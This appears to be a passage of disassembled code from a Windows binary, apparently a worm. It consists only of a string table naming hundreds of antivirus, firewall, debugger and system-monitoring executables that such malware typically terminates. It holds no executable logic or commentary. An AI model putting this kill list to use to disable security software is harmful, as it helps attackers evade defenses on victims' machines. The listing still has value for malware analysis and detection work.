aSsgrate_exe db 'SSGRATE.EXE',0 ; DATA XREF: .data:0042BC40�o
aSs3edit_exe db 'SS3EDIT.EXE',0 ; DATA XREF: .data:0042BC3C�o
aSrng_exe db 'SRNG.EXE',0 ; DATA XREF: .data:0042BC38�o
align 4
aSrexe_exe db 'SREXE.EXE',0 ; DATA XREF: .data:0042BC34�o
align 10h
aSpyxx_exe db 'SPYXX.EXE',0 ; DATA XREF: .data:0042BC30�o
align 4
aSpoolsv32_exe db 'SPOOLSV32.EXE',0 ; DATA XREF: .data:0042BC2C�o
align 4
aSpoolcv_exe db 'SPOOLCV.EXE',0 ; DATA XREF: .data:0042BC28�o
aSpoler_exe db 'SPOLER.EXE',0 ; DATA XREF: .data:0042BC24�o
align 4
aSphinx_exe db 'SPHINX.EXE',0 ; DATA XREF: .data:0042BC20�o
align 10h
aSpf_exe db 'SPF.EXE',0 ; DATA XREF: .data:0042BC1C�o
aSperm_exe db 'SPERM.EXE',0 ; DATA XREF: .data:0042BC18�o
align 4
aSofi_exe db 'SOFI.EXE',0 ; DATA XREF: .data:0042BC14�o
align 10h
aSoap_exe db 'SOAP.EXE',0 ; DATA XREF: .data:0042BC10�o
align 4
aSmss32_exe db 'SMSS32.EXE',0 ; DATA XREF: .data:0042BC0C�o
align 4
aSms_exe db 'SMS.EXE',0 ; DATA XREF: .data:0042BC08�o
aSmc_exe db 'SMC.EXE',0 ; DATA XREF: .data:0042BC04�o
aShowbehind_exe db 'SHOWBEHIND.EXE',0 ; DATA XREF: .data:0042BC00�o
align 4
aShn_exe db 'SHN.EXE',0 ; DATA XREF: .data:0042BBFC�o
aShellspyinstal db 'SHELLSPYINSTALL.EXE',0 ; DATA XREF: .data:0042BBF8�o
aSh_exe db 'SH.EXE',0 ; DATA XREF: .data:0042BBF4�o
align 4
aSgssfw32_exe db 'SGSSFW32.EXE',0 ; DATA XREF: .data:0042BBF0�o
align 4
aSfc_exe db 'SFC.EXE',0 ; DATA XREF: .data:0042BBEC�o
aSetup_flowprot db 'SETUP_FLOWPROTECTOR_US.EXE',0 ; DATA XREF: .data:0042BBE8�o
align 10h
aSetupvameeval_ db 'SETUPVAMEEVAL.EXE',0 ; DATA XREF: .data:0042BBE4�o
align 4
aServlces_exe db 'SERVLCES.EXE',0 ; DATA XREF: .data:0042BBE0�o
align 4
aServlce_exe db 'SERVLCE.EXE',0 ; DATA XREF: .data:0042BBDC�o
aService_exe db 'SERVICE.EXE',0 ; DATA XREF: .data:0042BBD8�o
aServ95_exe db 'SERV95.EXE',0 ; DATA XREF: .data:0042BBD4�o
align 4
aSd_exe db 'SD.EXE',0 ; DATA XREF: .data:0042BBD0�o
align 10h
aScvhost_exe db 'SCVHOST.EXE',0 ; DATA XREF: .data:0042BBCC�o
aScrsvr_exe db 'SCRSVR.EXE',0 ; DATA XREF: .data:0042BBC8�o
align 4
aScrscan_exe db 'SCRSCAN.EXE',0 ; DATA XREF: .data:0042BBC4�o
aScanpm_exe db 'SCANPM.EXE',0 ; DATA XREF: .data:0042BBC0�o
align 10h
aScan95_exe db 'SCAN95.EXE',0 ; DATA XREF: .data:0042BBBC�o
align 4
aScan32_exe db 'SCAN32.EXE',0 ; DATA XREF: .data:0042BBB8�o
align 4
aScam32_exe db 'SCAM32.EXE',0 ; DATA XREF: .data:0042BBB4�o
align 4
aSc_exe db 'SC.EXE',0 ; DATA XREF: .data:0042BBB0�o
align 4
aSbserv_exe db 'SBSERV.EXE',0 ; DATA XREF: .data:0042BBAC�o
align 4
aSavenow_exe db 'SAVENOW.EXE',0 ; DATA XREF: .data:0042BBA8�o
aSave_exe db 'SAVE.EXE',0 ; DATA XREF: .data:0042BBA4�o
align 10h
aSahagent_exe db 'SAHAGENT.EXE',0 ; DATA XREF: .data:0042BBA0�o
align 10h
aSafeweb_exe db 'SAFEWEB.EXE',0 ; DATA XREF: .data:0042BB9C�o
aRuxdll32_exe db 'RUXDLL32.EXE',0 ; DATA XREF: .data:0042BB98�o
align 4
aRundll16_exe db 'RUNDLL16.EXE',0 ; DATA XREF: .data:0042BB94�o
align 4
aRundll_exe db 'RUNDLL.EXE',0 ; DATA XREF: .data:0042BB90�o
align 4
aRun32dll_exe db 'RUN32DLL.EXE',0 ; DATA XREF: .data:0042BB8C�o
align 4
aRulaunch_exe db 'RULAUNCH.EXE',0 ; DATA XREF: .data:0042BB88�o
align 4
aRtvscn95_exe db 'RTVSCN95.EXE',0 ; DATA XREF: .data:0042BB84�o
align 4
aRtvscan_exe db 'RTVSCAN.EXE',0 ; DATA XREF: .data:0042BB80�o
aRshell_exe db 'RSHELL.EXE',0 ; DATA XREF: .data:0042BB7C�o
align 10h
aRrguard_exe db 'RRGUARD.EXE',0 ; DATA XREF: .data:0042BB78�o
aRescue32_exe db 'RESCUE32.EXE',0 ; DATA XREF: .data:0042BB74�o
align 4
aRescue_exe db 'RESCUE.EXE',0 ; DATA XREF: .data:0042BB70�o
align 4
aRegedt32_exe db 'REGEDT32.EXE',0 ; DATA XREF: .data:0042BB6C�o
align 4
aRegedit_exe db 'REGEDIT.EXE',0 ; DATA XREF: .data:0042BB68�o
aReged_exe db 'REGED.EXE',0 ; DATA XREF: .data:0042BB64�o
align 10h
aRealmon_exe db 'REALMON.EXE',0 ; DATA XREF: .data:0042BB60�o
aRcsync_exe db 'RCSYNC.EXE',0 ; DATA XREF: .data:0042BB5C�o
align 4
aRb32_exe db 'RB32.EXE',0 ; DATA XREF: .data:0042BB58�o
align 4
aRay_exe db 'RAY.EXE',0 ; DATA XREF: .data:0042BB54�o
aRav8win32eng_e db 'RAV8WIN32ENG.EXE',0 ; DATA XREF: .data:0042BB50�o
align 10h
aRav7win_exe db 'RAV7WIN.EXE',0 ; DATA XREF: .data:0042BB4C�o
aRav7_exe db 'RAV7.EXE',0 ; DATA XREF: .data:0042BB48�o
align 4
aRapapp_exe db 'RAPAPP.EXE',0 ; DATA XREF: .data:0042BB44�o
align 4
aQserver_exe db 'QSERVER.EXE',0 ; DATA XREF: .data:0042BB40�o
aQconsole_exe db 'QCONSOLE.EXE',0 ; DATA XREF: .data:0042BB3C�o
align 10h
aPview95_exe db 'PVIEW95.EXE',0 ; DATA XREF: .data:0042BB38�o
aPussy_exe db 'PUSSY.EXE',0 ; DATA XREF: .data:0042BB34�o
align 4
aPurge_exe db 'PURGE.EXE',0 ; DATA XREF: .data:0042BB30�o
align 4
aPspf_exe db 'PSPF.EXE',0 ; DATA XREF: .data:0042BB2C�o
align 10h
aProtectx_exe db 'PROTECTX.EXE',0 ; DATA XREF: .data:0042BB28�o
align 10h
aProport_exe db 'PROPORT.EXE',0 ; DATA XREF: .data:0042BB24�o
aProgramauditor db 'PROGRAMAUDITOR.EXE',0 ; DATA XREF: .data:0042BB20�o
align 10h
aProcexplorerv1 db 'PROCEXPLORERV1.0.EXE',0 ; DATA XREF: .data:0042BB1C�o
align 4
aProcessmonitor db 'PROCESSMONITOR.EXE',0 ; DATA XREF: .data:0042BB18�o
align 4
aProcdump_exe db 'PROCDUMP.EXE',0 ; DATA XREF: .data:0042BB14�o
align 4
aPrmvr_exe db 'PRMVR.EXE',0 ; DATA XREF: .data:0042BB10�o
align 4
aPrmt_exe db 'PRMT.EXE',0 ; DATA XREF: .data:0042BB0C�o
align 4
aPrizesurfer_ex db 'PRIZESURFER.EXE',0 ; DATA XREF: .data:0042BB08�o
aPpvstop_exe db 'PPVSTOP.EXE',0 ; DATA XREF: .data:0042BB04�o
aPptbc_exe db 'PPTBC.EXE',0 ; DATA XREF: .data:0042BB00�o
align 4
aPpinupdt_exe db 'PPINUPDT.EXE',0 ; DATA XREF: .data:0042BAFC�o
align 4
aPowerscan_exe db 'POWERSCAN.EXE',0 ; DATA XREF: .data:0042BAF8�o
align 4
aPortmonitor_ex db 'PORTMONITOR.EXE',0 ; DATA XREF: .data:0042BAF4�o
aPortdetective_ db 'PORTDETECTIVE.EXE',0 ; DATA XREF: .data:0042BAF0�o
align 10h
aPopscan_exe db 'POPSCAN.EXE',0 ; DATA XREF: .data:0042BAEC�o
aPoproxy_exe db 'POPROXY.EXE',0 ; DATA XREF: .data:0042BAE8�o
aPop3trap_exe db 'POP3TRAP.EXE',0 ; DATA XREF: .data:0042BAE4�o
align 4
aPlatin_exe db 'PLATIN.EXE',0 ; DATA XREF: .data:0042BAE0�o
align 4
aPingscan_exe db 'PINGSCAN.EXE',0 ; DATA XREF: .data:0042BADC�o
align 4
aPgmonitr_exe db 'PGMONITR.EXE',0 ; DATA XREF: .data:0042BAD8�o
align 4
aPfwadmin_exe db 'PFWADMIN.EXE',0 ; DATA XREF: .data:0042BAD4�o
align 4
aPf2_exe db 'PF2.EXE',0 ; DATA XREF: .data:0042BAD0�o
aPerswf_exe db 'PERSWF.EXE',0 ; DATA XREF: .data:0042BACC�o
align 4
aPersfw_exe db 'PERSFW.EXE',0 ; DATA XREF: .data:0042BAC8�o
align 4
aPeriscope_exe db 'PERISCOPE.EXE',0 ; DATA XREF: .data:0042BAC4�o
align 4
aPenis_exe db 'PENIS.EXE',0 ; DATA XREF: .data:0042BAC0�o
align 10h
aPdsetup_exe db 'PDSETUP.EXE',0 ; DATA XREF: .data:0042BABC�o
aPcscan_exe db 'PCSCAN.EXE',0 ; DATA XREF: .data:0042BAB8�o
align 4
aPcip10117_0_ex db 'PCIP10117_0.EXE',0 ; DATA XREF: .data:0042BAB4�o
aPcfwallicon_ex db 'PCFWALLICON.EXE',0 ; DATA XREF: .data:0042BAB0�o
aPcdsetup_exe db 'PCDSETUP.EXE',0 ; DATA XREF: .data:0042BAAC�o
align 4
aPccwin98_exe db 'PCCWIN98.EXE',0 ; DATA XREF: .data:0042BAA8�o
align 4
aPccwin97_exe db 'PCCWIN97.EXE',0 ; DATA XREF: .data:0042BAA4�o
align 4
aPccntmon_exe db 'PCCNTMON.EXE',0 ; DATA XREF: .data:0042BAA0�o
align 4
aPcciomon_exe db 'PCCIOMON.EXE',0 ; DATA XREF: .data:0042BA9C�o
align 4
aPcc2k_76_1436_ db 'PCC2K_76_1436.EXE',0 ; DATA XREF: .data:0042BA98�o
align 4
aPcc2002s902_ex db 'PCC2002S902.EXE',0 ; DATA XREF: .data:0042BA94�o
aPavw_exe db 'PAVW.EXE',0 ; DATA XREF: .data:0042BA90�o
align 4
aPavsched_exe db 'PAVSCHED.EXE',0 ; DATA XREF: .data:0042BA8C�o
align 4
aPavproxy_exe db 'PAVPROXY.EXE',0 ; DATA XREF: .data:0042BA88�o
align 4
aPavcl_exe db 'PAVCL.EXE',0 ; DATA XREF: .data:0042BA84�o
align 4
aPatch_exe db 'PATCH.EXE',0 ; DATA XREF: .data:0042BA80�o
align 10h
aPanixk_exe db 'PANIXK.EXE',0 ; DATA XREF: .data:0042BA7C�o
align 4
aPadmin_exe db 'PADMIN.EXE',0 ; DATA XREF: .data:0042BA78�o
align 4
aOutpostproinst db 'OUTPOSTPROINSTALL.EXE',0 ; DATA XREF: .data:0042BA74�o
align 10h
aOutpostinstall db 'OUTPOSTINSTALL.EXE',0 ; DATA XREF: .data:0042BA70�o
align 4
aOutpost_exe db 'OUTPOST.EXE',0 ; DATA XREF: .data:0042BA68�o
; .data:0042BA6C�o
aOtfix_exe db 'OTFIX.EXE',0 ; DATA XREF: .data:0042BA64�o
align 4
aOstronet_exe db 'OSTRONET.EXE',0 ; DATA XREF: .data:0042BA60�o
align 4
aOptimize_exe db 'OPTIMIZE.EXE',0 ; DATA XREF: .data:0042BA5C�o
align 4
aOnsrvr_exe db 'ONSRVR.EXE',0 ; DATA XREF: .data:0042BA58�o
align 4
aOllydbg_exe db 'OLLYDBG.EXE',0 ; DATA XREF: .data:0042BA54�o
aNwtool16_exe db 'NWTOOL16.EXE',0 ; DATA XREF: .data:0042BA50�o
align 4
aNwservice_exe db 'NWSERVICE.EXE',0 ; DATA XREF: .data:0042BA4C�o
align 4
aNwinst4_exe db 'NWINST4.EXE',0 ; DATA XREF: .data:0042BA48�o
aNvsvc32_exe db 'NVSVC32.EXE',0 ; DATA XREF: .data:0042BA44�o
aNvc95_exe db 'NVC95.EXE',0 ; DATA XREF: .data:0042BA40�o
align 4
aNvarch16_exe db 'NVARCH16.EXE',0 ; DATA XREF: .data:0042BA3C�o
align 4
aNupgrade_exe db 'NUPGRADE.EXE',0 ; DATA XREF: .data:0042BA34�o
; .data:0042BA38�o
align 4
aNui_exe db 'NUI.EXE',0 ; DATA XREF: .data:0042BA30�o
aNtxconfig_exe db 'NTXconfig.EXE',0 ; DATA XREF: .data:0042BA2C�o
align 10h
aNtvdm_exe db 'NTVDM.EXE',0 ; DATA XREF: .data:0042BA28�o
align 4
aNtrtscan_exe db 'NTRTSCAN.EXE',0 ; DATA XREF: .data:0042BA24�o
align 4
aNt_exe db 'NT.EXE',0 ; DATA XREF: .data:0042BA20�o
align 4
aNsupdate_exe db 'NSUPDATE.EXE',0 ; DATA XREF: .data:0042BA1C�o
align 4
aNstask32_exe db 'NSTASK32.EXE',0 ; DATA XREF: .data:0042BA18�o
align 4
aNssys32_exe db 'NSSYS32.EXE',0 ; DATA XREF: .data:0042BA14�o
aNsched32_exe db 'NSCHED32.EXE',0 ; DATA XREF: .data:0042BA10�o
align 10h
aNpssvc_exe db 'NPSSVC.EXE',0 ; DATA XREF: .data:0042BA0C�o
align 4
aNpscheck_exe db 'NPSCHECK.EXE',0 ; DATA XREF: .data:0042BA08�o
align 4
aNprotect_exe db 'NPROTECT.EXE',0 ; DATA XREF: .data:0042BA04�o
align 4
aNpfmessenger_e db 'NPFMESSENGER.EXE',0 ; DATA XREF: .data:0042BA00�o
align 10h
aNpf40_tw_98_nt db 'NPF40_TW_98_NT_ME_2K.EXE',0 ; DATA XREF: .data:0042B9FC�o
align 4
aNotstart_exe db 'NOTSTART.EXE',0 ; DATA XREF: .data:0042B9F8�o
align 4
aNorton_interne db 'NORTON_INTERNET_SECU_3.0_407.EXE',0 ; DATA XREF: .data:0042B9F4�o
align 10h
aNormist_exe db 'NORMIST.EXE',0 ; DATA XREF: .data:0042B9F0�o
aNod32_exe db 'NOD32.EXE',0 ; DATA XREF: .data:0042B9EC�o
align 4
aNmain_exe db 'NMAIN.EXE',0 ; DATA XREF: .data:0042B9E8�o
align 4
aNisum_exe db 'NISUM.EXE',0 ; DATA XREF: .data:0042B9E4�o
align 10h
aNisserv_exe db 'NISSERV.EXE',0 ; DATA XREF: .data:0042B9E0�o
aNetutils_exe db 'NETUTILS.EXE',0 ; DATA XREF: .data:0042B9DC�o
align 4
aNetstat_exe db 'NETSTAT.EXE',0 ; DATA XREF: .data:0042B9D8�o
aNetspyhunter1_ db 'NETSPYHUNTER-1.2.EXE',0 ; DATA XREF: .data:0042B9D4�o
align 10h
aNetscanpro_exe db 'NETSCANPRO.EXE',0 ; DATA XREF: .data:0042B9D0�o
align 10h
aNetmon_exe db 'NETMON.EXE',0 ; DATA XREF: .data:0042B9CC�o
align 4
aNetinfo_exe db 'NETINFO.EXE',0 ; DATA XREF: .data:0042B9C8�o
aNetd32_exe db 'NETD32.EXE',0 ; DATA XREF: .data:0042B9C4�o
align 4
aNetarmor_exe db 'NETARMOR.EXE',0 ; DATA XREF: .data:0042B9C0�o
align 4
aNeowatchlog_ex db 'NEOWATCHLOG.EXE',0 ; DATA XREF: .data:0042B9BC�o
aNeomonitor_exe db 'NEOMONITOR.EXE',0 ; DATA XREF: .data:0042B9B8�o
align 4
aNdd32_exe db 'NDD32.EXE',0 ; DATA XREF: .data:0042B9B4�o
align 10h
aNcinst4_exe db 'NCINST4.EXE',0 ; DATA XREF: .data:0042B9B0�o
aNc2000_exe db 'NC2000.EXE',0 ; DATA XREF: .data:0042B9AC�o
align 4
aNavwnt_exe db 'NAVWNT.EXE',0 ; DATA XREF: .data:0042B9A8�o
align 4
aNavw32_exe db 'NAVW32.EXE',0 ; DATA XREF: .data:0042B9A4�o
align 10h
aNavstub_exe db 'NAVSTUB.EXE',0 ; DATA XREF: .data:0042B9A0�o
aNavnt_exe db 'NAVNT.EXE',0 ; DATA XREF: .data:0042B99C�o
align 4
aNavlu32_exe db 'NAVLU32.EXE',0 ; DATA XREF: .data:0042B998�o
aNavengnavex15_ db 'NAVENGNAVEX15.NAVLU32.EXE',0 ; DATA XREF: .data:0042B994�o
align 10h
aNavdx_exe db 'NAVDX.EXE',0 ; DATA XREF: .data:0042B990�o
align 4
aNavapw32_exe db 'NAVAPW32.EXE',0 ; DATA XREF: .data:0042B98C�o
align 4
aNavapsvc_exe db 'NAVAPSVC.EXE',0 ; DATA XREF: .data:0042B988�o
align 4
aNavap_navapsvc db 'NAVAP.NAVAPSVC.EXE',0 ; DATA XREF: .data:0042B984�o
align 10h
aAutoProtect_na db 'AUTO-PROTECT.NAV80TRY.EXE',0 ; DATA XREF: .data:0042B980�o
align 4
aNav_exe db 'NAV.EXE',0 ; DATA XREF: .data:0042B97C�o
aN32scanw_exe db 'N32SCANW.EXE',0 ; DATA XREF: .data:0042B978�o
align 4
aMwatch_exe db 'MWATCH.EXE',0 ; DATA XREF: .data:0042B974�o
align 10h
aMu0311ad_exe db 'MU0311AD.EXE',0 ; DATA XREF: .data:0042B970�o
align 10h
aMsvxd_exe db 'MSVXD.EXE',0 ; DATA XREF: .data:0042B96C�o
align 4
aMssys_exe db 'MSSYS.EXE',0 ; DATA XREF: .data:0042B968�o
align 4
aMssmmc32_exe db 'MSSMMC32.EXE',0 ; DATA XREF: .data:0042B964�o
align 4
aMsmsgri32_exe db 'MSMSGRI32.EXE',0 ; DATA XREF: .data:0042B960�o
align 4
aMsmgt_exe db 'MSMGT.EXE',0 ; DATA XREF: .data:0042B95C�o
align 4
aMslaugh_exe db 'MSLAUGH.EXE',0 ; DATA XREF: .data:0042B958�o
aMsinfo32_exe db 'MSINFO32.EXE',0 ; DATA XREF: .data:0042B954�o
align 10h
aMsiexec16_exe db 'MSIEXEC16.EXE',0 ; DATA XREF: .data:0042B950�o
align 10h
aMsdos_exe db 'MSDOS.EXE',0 ; DATA XREF: .data:0042B94C�o
align 4
aMsdm_exe db 'MSDM.EXE',0 ; DATA XREF: .data:0042B948�o
align 4
aMsconfig_exe_0 db 'MSCONFIG.EXE',0 ; DATA XREF: .data:0042B944�o
align 4
aMscman_exe db 'MSCMAN.EXE',0 ; DATA XREF: .data:0042B940�o
align 4
aMsccn32_exe db 'MSCCN32.EXE',0 ; DATA XREF: .data:0042B93C�o
aMscache_exe db 'MSCACHE.EXE',0 ; DATA XREF: .data:0042B938�o
aMsblast_exe db 'MSBLAST.EXE',0 ; DATA XREF: .data:0042B934�o
aMsbb_exe db 'MSBB.EXE',0 ; DATA XREF: .data:0042B930�o
align 4
aMsapp_exe db 'MSAPP.EXE',0 ; DATA XREF: .data:0042B92C�o
align 10h
aMrflux_exe db 'MRFLUX.EXE',0 ; DATA XREF: .data:0042B928�o
align 4
aMpftray_exe db 'MPFTRAY.EXE',0 ; DATA XREF: .data:0042B924�o
aMpfservice_exe db 'MPFSERVICE.EXE',0 ; DATA XREF: .data:0042B920�o
align 4
aMpfagent_exe db 'MPFAGENT.EXE',0 ; DATA XREF: .data:0042B91C�o
align 4
aMostat_exe db 'MOSTAT.EXE',0 ; DATA XREF: .data:0042B918�o
align 4
aMoolive_exe db 'MOOLIVE.EXE',0 ; DATA XREF: .data:0042B914�o
aMonitor_exe db 'MONITOR.EXE',0 ; DATA XREF: .data:0042B910�o
aMmod_exe db 'MMOD.EXE',0 ; DATA XREF: .data:0042B90C�o
align 4
aMinilog_exe db 'MINILOG.EXE',0 ; DATA XREF: .data:0042B908�o
aMgui_exe db 'MGUI.EXE',0 ; DATA XREF: .data:0042B904�o
align 10h
aMghtml_exe db 'MGHTML.EXE',0 ; DATA XREF: .data:0042B900�o
align 4
aMgavrte_exe db 'MGAVRTE.EXE',0 ; DATA XREF: .data:0042B8FC�o
aMgavrtcl_exe db 'MGAVRTCL.EXE',0 ; DATA XREF: .data:0042B8F8�o
align 4
aMfweng3_02d30_ db 'MFWENG3.02D30.EXE',0 ; DATA XREF: .data:0042B8F4�o
align 4
aMfw2en_exe db 'MFW2EN.EXE',0 ; DATA XREF: .data:0042B8F0�o
align 4
aMfin32_exe db 'MFIN32.EXE',0 ; DATA XREF: .data:0042B8EC�o
align 4
aMd_exe db 'MD.EXE',0 ; DATA XREF: .data:0042B8E8�o
align 4
aMcvsshld_exe db 'MCVSSHLD.EXE',0 ; DATA XREF: .data:0042B8E4�o
align 4
aMcvsrte_exe db 'MCVSRTE.EXE',0 ; DATA XREF: .data:0042B8E0�o
aMcupdate_exe db 'MCUPDATE.EXE',0 ; DATA XREF: .data:0042B8D8�o
; .data:0042B8DC�o
align 4
aMctool_exe db 'MCTOOL.EXE',0 ; DATA XREF: .data:0042B8D4�o
align 4
aMcshield_exe db 'MCSHIELD.EXE',0 ; DATA XREF: .data:0042B8D0�o
align 4
aMcmnhdlr_exe db 'MCMNHDLR.EXE',0 ; DATA XREF: .data:0042B8CC�o
align 4
aMcagent_exe db 'MCAGENT.EXE',0 ; DATA XREF: .data:0042B8C8�o
aMapisvc32_exe db 'MAPISVC32.EXE',0 ; DATA XREF: .data:0042B8C4�o
align 10h
aLuspt_exe db 'LUSPT.EXE',0 ; DATA XREF: .data:0042B8C0�o
align 4
aLuinit_exe db 'LUINIT.EXE',0 ; DATA XREF: .data:0042B8BC�o
align 4
aLucomserver_ex db 'LUCOMSERVER.EXE',0 ; DATA XREF: .data:0042B8B8�o
aLuau_exe db 'LUAU.EXE',0 ; DATA XREF: .data:0042B8B4�o
align 4
aLuall_exe db 'LUALL.EXE',0 ; DATA XREF: .data:0042B8AC�o
; .data:0042B8B0�o
align 10h
aLsetup_exe db 'LSETUP.EXE',0 ; DATA XREF: .data:0042B8A8�o
align 4
aLordpe_exe db 'LORDPE.EXE',0 ; DATA XREF: .data:0042B8A4�o
align 4
aLookout_exe db 'LOOKOUT.EXE',0 ; DATA XREF: .data:0042B8A0�o
aLockdown2000_e db 'LOCKDOWN2000.EXE',0 ; DATA XREF: .data:0042B89C�o
align 4
aLockdown_exe db 'LOCKDOWN.EXE',0 ; DATA XREF: .data:0042B898�o
align 4
aLocalnet_exe db 'LOCALNET.EXE',0 ; DATA XREF: .data:0042B894�o
align 4
aLoader_exe db 'LOADER.EXE',0 ; DATA XREF: .data:0042B890�o
align 4
aLnetinfo_exe db 'LNETINFO.EXE',0 ; DATA XREF: .data:0042B88C�o
align 4
aLdscan_exe db 'LDSCAN.EXE',0 ; DATA XREF: .data:0042B888�o
align 10h
aLdpromenu_exe db 'LDPROMENU.EXE',0 ; DATA XREF: .data:0042B884�o
align 10h
aLdpro_exe db 'LDPRO.EXE',0 ; DATA XREF: .data:0042B880�o
align 4
aLdnetmon_exe db 'LDNETMON.EXE',0 ; DATA XREF: .data:0042B87C�o
align 4
aLauncher_exe db 'LAUNCHER.EXE',0 ; DATA XREF: .data:0042B878�o
align 4
aKillprocessset db 'KILLPROCESSSETUP161.EXE',0 ; DATA XREF: .data:0042B874�o
aKernel32_exe db 'KERNEL32.EXE',0 ; DATA XREF: .data:0042B870�o
align 4
aKerioWrp421EnW db 'KERIO-WRP-421-EN-WIN.EXE',0 ; DATA XREF: .data:0042B86C�o
align 10h
aKerioWrl421EnW db 'KERIO-WRL-421-EN-WIN.EXE',0 ; DATA XREF: .data:0042B868�o
align 4
aKerioPf213EnWi db 'KERIO-PF-213-EN-WIN.EXE',0 ; DATA XREF: .data:0042B864�o
aKeenvalue_exe db 'KEENVALUE.EXE',0 ; DATA XREF: .data:0042B860�o
align 4
aKazza_exe db 'KAZZA.EXE',0 ; DATA XREF: .data:0042B85C�o
align 10h
aKavpf_exe db 'KAVPF.EXE',0 ; DATA XREF: .data:0042B858�o
align 4
aKavpers40eng_e db 'KAVPERS40ENG.EXE',0 ; DATA XREF: .data:0042B854�o
align 10h
aKavlite40eng_e db 'KAVLITE40ENG.EXE',0 ; DATA XREF: .data:0042B850�o
align 4
aJedi_exe db 'JEDI.EXE',0 ; DATA XREF: .data:0042B84C�o
align 10h
aJdbgmrg_exe db 'JDBGMRG.EXE',0 ; DATA XREF: .data:0042B848�o
aJammer_exe db 'JAMMER.EXE',0 ; DATA XREF: .data:0042B844�o
align 4
aIstsvc_exe db 'ISTSVC.EXE',0 ; DATA XREF: .data:0042B840�o
align 4
aIsrv95_exe db 'ISRV95.EXE',0 ; DATA XREF: .data:0042B83C�o
align 10h
aIsass_exe db 'ISASS.EXE',0 ; DATA XREF: .data:0042B838�o
align 4
aIris_exe db 'IRIS.EXE',0 ; DATA XREF: .data:0042B834�o
align 4
aIparmor_exe db 'IPARMOR.EXE',0 ; DATA XREF: .data:0042B830�o
aIomon98_exe db 'IOMON98.EXE',0 ; DATA XREF: .data:0042B82C�o
aIntren_exe db 'INTREN.EXE',0 ; DATA XREF: .data:0042B828�o
align 4
aIntdel_exe db 'INTDEL.EXE',0 ; DATA XREF: .data:0042B824�o
align 4
aInit_exe db 'INIT.EXE',0 ; DATA XREF: .data:0042B820�o
align 4
aInfwin_exe db 'INFWIN.EXE',0 ; DATA XREF: .data:0042B81C�o
align 10h
aInfus_exe db 'INFUS.EXE',0 ; DATA XREF: .data:0042B818�o
align 4
aInetlnfo_exe db 'INETLNFO.EXE',0 ; DATA XREF: .data:0042B814�o
align 4
aIfw2000_exe db 'IFW2000.EXE',0 ; DATA XREF: .data:0042B810�o
aIface_exe db 'IFACE.EXE',0 ; DATA XREF: .data:0042B80C�o
align 4
aIexplorer_exe db 'IEXPLORER.EXE',0 ; DATA XREF: .data:0042B808�o
align 4
aIedriver_exe db 'IEDRIVER.EXE',0 ; DATA XREF: .data:0042B804�o
align 4
aIedll_exe db 'IEDLL.EXE',0 ; DATA XREF: .data:0042B800�o
align 10h
aIdle_exe db 'IDLE.EXE',0 ; DATA XREF: .data:0042B7FC�o
align 4
aIcsuppnt_exe db 'ICSUPPNT.EXE',0 ; DATA XREF: .data:0042B7F8�o
align 4
aIcsupp95_exe db 'ICSUPP95.EXE',0 ; DATA XREF: .data:0042B7F0�o
; .data:0042B7F4�o
align 4
aIcmon_exe db 'ICMON.EXE',0 ; DATA XREF: .data:0042B7EC�o
align 4
aIcloadnt_exe db 'ICLOADNT.EXE',0 ; DATA XREF: .data:0042B7E8�o
align 4
aIcload95_exe db 'ICLOAD95.EXE',0 ; DATA XREF: .data:0042B7E4�o
align 4
aIbmavsp_exe db 'IBMAVSP.EXE',0 ; DATA XREF: .data:0042B7E0�o
aIbmasn_exe db 'IBMASN.EXE',0 ; DATA XREF: .data:0042B7DC�o
align 10h
aIamstats_exe db 'IAMSTATS.EXE',0 ; DATA XREF: .data:0042B7D8�o
align 10h
aIamserv_exe db 'IAMSERV.EXE',0 ; DATA XREF: .data:0042B7D4�o
aIamapp_exe db 'IAMAPP.EXE',0 ; DATA XREF: .data:0042B7D0�o
align 4
aHxiul_exe db 'HXIUL.EXE',0 ; DATA XREF: .data:0042B7CC�o
align 4
aHxdl_exe db 'HXDL.EXE',0 ; DATA XREF: .data:0042B7C8�o
align 10h
aHwpe_exe db 'HWPE.EXE',0 ; DATA XREF: .data:0042B7C4�o
align 4
aHtpatch_exe db 'HTPATCH.EXE',0 ; DATA XREF: .data:0042B7C0�o
aHtlog_exe db 'HTLOG.EXE',0 ; DATA XREF: .data:0042B7BC�o
align 4
aHotpatch_exe db 'HOTPATCH.EXE',0 ; DATA XREF: .data:0042B7B8�o
align 4
aHotactio_exe db 'HOTACTIO.EXE',0 ; DATA XREF: .data:0042B7B4�o
align 4
aHbsrv_exe db 'HBSRV.EXE',0 ; DATA XREF: .data:0042B7B0�o
align 10h
aHbinst_exe db 'HBINST.EXE',0 ; DATA XREF: .data:0042B7AC�o
align 4
aHacktracersetu db 'HACKTRACERSETUP.EXE',0 ; DATA XREF: .data:0042B7A8�o
aGuarddog_exe db 'GUARDDOG.EXE',0 ; DATA XREF: .data:0042B7A4�o
align 10h
aGuard_exe db 'GUARD.EXE',0 ; DATA XREF: .data:0042B7A0�o
align 4
aGmt_exe db 'GMT.EXE',0 ; DATA XREF: .data:0042B79C�o
aGenerics_exe db 'GENERICS.EXE',0 ; DATA XREF: .data:0042B798�o
align 4
aGbpoll_exe db 'GBPOLL.EXE',0 ; DATA XREF: .data:0042B794�o
align 10h
aGbmenu_exe db 'GBMENU.EXE',0 ; DATA XREF: .data:0042B790�o
align 4
aGator_exe db 'GATOR.EXE',0 ; DATA XREF: .data:0042B78C�o
align 4
aFsmb32_exe db 'FSMB32.EXE',0 ; DATA XREF: .data:0042B788�o
align 4
aFsma32_exe db 'FSMA32.EXE',0 ; DATA XREF: .data:0042B784�o
align 10h
aFsm32_exe db 'FSM32.EXE',0 ; DATA XREF: .data:0042B780�o
align 4
aFsgk32_exe db 'FSGK32.EXE',0 ; DATA XREF: .data:0042B77C�o
align 4
aFsav95_exe db 'FSAV95.EXE',0 ; DATA XREF: .data:0042B778�o
align 4
aFsav530wtbyb_e db 'FSAV530WTBYB.EXE',0 ; DATA XREF: .data:0042B774�o
align 4
aFsav530stbyb_e db 'FSAV530STBYB.EXE',0 ; DATA XREF: .data:0042B770�o
align 4
aFsav32_exe db 'FSAV32.EXE',0 ; DATA XREF: .data:0042B76C�o
align 4
aFsav_exe db 'FSAV.EXE',0 ; DATA XREF: .data:0042B768�o
align 4
aFsaa_exe db 'FSAA.EXE',0 ; DATA XREF: .data:0042B764�o
align 10h
aFrw_exe db 'FRW.EXE',0 ; DATA XREF: .data:0042B760�o
aFprot_exe db 'FPROT.EXE',0 ; DATA XREF: .data:0042B75C�o
align 4
aFpWin_trial_ex db 'FP-WIN_TRIAL.EXE',0 ; DATA XREF: .data:0042B758�o
align 4
